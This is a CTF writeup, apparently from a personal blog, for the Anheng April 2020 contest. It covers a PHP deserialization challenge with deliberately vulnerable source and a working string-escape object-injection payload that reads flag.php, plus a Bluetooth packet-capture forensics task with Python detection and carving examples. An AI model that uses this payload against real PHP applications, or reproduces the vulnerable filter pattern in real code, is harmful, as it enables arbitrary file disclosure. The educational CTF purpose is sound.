Anheng April 2020 CTF (安恒2020四月赛)

source link: https://yanmymickey.github.io/2020/04/25/CTF_WP/%E5%AE%89%E6%81%922020%E5%9B%9B%E6%9C%88%E8%B5%9B/

Posted on 2020-04-25, edited on 2021-01-16. In CTF, WP

I can only do the easy problems and scrape together a few points 😢

```php
<?php

show_source("index.php");

// Replace the three-byte sequence NUL '*' NUL with the six-character literal '\0\0\0'.
function write ($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

// Reverse mapping: the six-character literal '\0\0\0' back to the three bytes NUL '*' NUL.
function read ($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
    public $username;
    public $password;

    function __construct ($a, $b) {
        $this->username = $a;
        $this->password = $b;
    }
}

class B {
    public $b = "gpy";
    function __destruct () {
        $c = 'a' . $this->b;   // concatenation calls __toString() if $b holds an object
        echo $c;
    }
}

class C {
    public $c;

    function __toString () {
        //flag.php
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'], $_GET['b']);
$b = unserialize(read(write(serialize($a))));
```
```php
function read ($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
```

The read function replaces the literal '\0\0\0' with chr(0) . '*' . chr(0), but the latter is only three characters while the former is six. Because serialize() has already written each string's length prefix, every replacement shrinks the string without changing its declared length, so the characters that follow escape into the deserialized structure.

Payload:

```text
?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&b=;s:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
```

```shell
curl --range 0-100 http://balabala/1Gfile.file
```
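To make the length desynchronisation concrete from the defender's side, here is an added Python example (not the challenge's code and not from the original writeup) that re-implements the write()/read() filters and PHP's serialize() output for class A, then walks the filtered blob and reports every string whose declared length no longer lands on its closing `";`. The function names, the benign sample login and the way the writeup's payload is embedded are all my own constructions; the check generalises to any transform that changes the length of already-serialized data, since the length prefixes are computed before the transform runs.

```python
import re

# Constructed re-implementation of the challenge's write()/read() filters
# (example code, not the page's own PHP).
NUL_STAR = "\x00*\x00"   # three bytes: NUL, '*', NUL
LITERAL = r"\0\0\0"      # six ASCII characters: backslash-zero three times


def write_filter(data):
    return data.replace(NUL_STAR, LITERAL)


def read_filter(data):
    return data.replace(LITERAL, NUL_STAR)


def serialize_a(username, password):
    """Mimic PHP serialize() for class A with two public string properties.
    PHP writes the byte length of each string in front of its contents."""
    return ('O:1:"A":2:{s:8:"username";s:%d:"%s";s:8:"password";s:%d:"%s";}'
            % (len(username), username, len(password), password))


_STR_HEADER = re.compile(r's:(\d+):"')


def string_length_mismatches(blob):
    """Walk the serialized blob token by token and report every string whose
    declared length does not land exactly on its closing '";'.
    Returns a list of (offset, declared_length); an empty list means consistent."""
    mismatches = []
    pos = 0
    while True:
        m = _STR_HEADER.search(blob, pos)
        if m is None:
            break
        declared = int(m.group(1))
        end = m.end() + declared
        if blob[end:end + 2] == '";':
            pos = end + 2            # consistent string: skip over its contents
        else:
            mismatches.append((m.start(), declared))
            pos = m.end()            # contents boundary unknown: keep scanning
    return mismatches


def filtered_blob(username, password):
    """The exact pipeline the challenge runs before unserialize()."""
    return read_filter(write_filter(serialize_a(username, password)))


# Constructed sample inputs: an ordinary login and the writeup's payload.
BENIGN = ("alice", "s3cret")
PAYLOAD = (r"\0" * 27,
           ';s:";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}')

if __name__ == "__main__":
    for user, pw in (BENIGN, PAYLOAD):
        blob = filtered_blob(user, pw)
        print(len(serialize_a(user, pw)), "->", len(blob),
              string_length_mismatches(blob))
```

For the benign login the blob is byte-identical before and after the filters and the scanner reports nothing; for the payload the username shrinks by 27 bytes (nine groups of six characters become nine groups of three), and the scanner flags the `s:54:` string whose declared length now runs 27 bytes past its real end. Running that check, or simply refusing input whose filtered length differs from its serialized length, before calling unserialize() stops the escape.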

MISC1

The download is a packet capture.

A quick look shows it is Bluetooth traffic.

First, sort by protocol.


Look for OBEX, the Bluetooth object transfer protocol.


Copy out the data block of the 7z archive, save it as a .7z file with WinHex or 010 Editor, and extract it; it asks for a PIN.


Remove the filter and use Ctrl+F to search for the PIN; it is there, and extracting with it gives the flag.
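Copying the archive bytes out by hand works, but the 7z start header tells you exactly where the archive ends, so the carving step can be automated and verified. The following is an added Python example (my own code, not part of the original writeup): it locates the 7z signature in a byte buffer, parses the fixed 32-byte start header, checks both CRC fields so that stray signature bytes in the capture are rejected, and slices out the exact archive length. The capture buffer and the tiny stand-in archive are constructed inline; the "archive" has a valid start header but placeholder packed-stream and next-header bytes, so it demonstrates carving, not decompression.

```python
import struct
import zlib

SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"
START_HEADER_LEN = 32


def parse_start_header(buf, off):
    """Parse the fixed 32-byte 7z start header at buf[off:] and verify its CRC.
    Layout: magic(6) major(1) minor(1) StartHeaderCRC(4)
            NextHeaderOffset(8) NextHeaderSize(8) NextHeaderCRC(4), all little-endian.
    Returns a dict, or None if the bytes are not a valid start header."""
    if buf[off:off + 6] != SEVENZ_MAGIC or len(buf) - off < START_HEADER_LEN:
        return None
    major, minor, start_crc = struct.unpack_from("<BBI", buf, off + 6)
    # StartHeaderCRC covers the 20 bytes that follow it (offsets 12..31)
    if zlib.crc32(buf[off + 12:off + 32]) != start_crc:
        return None
    next_off, next_size, next_crc = struct.unpack_from("<QQI", buf, off + 12)
    return {"version": (major, minor), "next_header_offset": next_off,
            "next_header_size": next_size, "next_header_crc": next_crc}


def carve_7z(buf):
    """Return every byte-exact 7z archive embedded in buf, validating both CRCs.
    The archive length is 32 + NextHeaderOffset + NextHeaderSize, because the
    next header is the last thing in a 7z file."""
    found = []
    pos = buf.find(SEVENZ_MAGIC)
    while pos != -1:
        hdr = parse_start_header(buf, pos)
        if hdr is not None:
            total = START_HEADER_LEN + hdr["next_header_offset"] + hdr["next_header_size"]
            nh_start = pos + START_HEADER_LEN + hdr["next_header_offset"]
            next_header = buf[nh_start:pos + total]
            if pos + total <= len(buf) and zlib.crc32(next_header) == hdr["next_header_crc"]:
                found.append(buf[pos:pos + total])
        pos = buf.find(SEVENZ_MAGIC, pos + 1)
    return found


def build_sample_archive():
    """Constructed stand-in for a tiny 7z file: a genuine start header wrapped
    around placeholder packed-stream and next-header bytes (not decompressible)."""
    packed = bytes(range(40))                                 # fake packed stream
    next_header = b"\x01\x04\x06\x00\x00\x00\x00\x00\x00\x00"  # fake next header
    tail = struct.pack("<QQI", len(packed), len(next_header), zlib.crc32(next_header))
    start = SEVENZ_MAGIC + bytes([0, 4]) + struct.pack("<I", zlib.crc32(tail)) + tail
    return start + packed + next_header


# Constructed capture: OBEX-like noise, a decoy signature with a bad CRC,
# the archive, then trailing bytes from later packets.
SAMPLE_CAPTURE = (b"OBEX PUT flag.7z " + SEVENZ_MAGIC + b"\x00" * 26
                  + b"..." + build_sample_archive() + b"OBEX CONTINUE ...")

if __name__ == "__main__":
    for archive in carve_7z(SAMPLE_CAPTURE):
        print(len(archive), "bytes carved, starts with", archive[:6])
```

On a real capture you would feed it the reassembled OBEX body (for example the bytes exported from Wireshark's Follow Stream or a hex editor) and write each returned slice to a .7z file; the CRC checks mean a hit is an archive with an intact header rather than six coincidental bytes.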


Study hard and make progress every day.
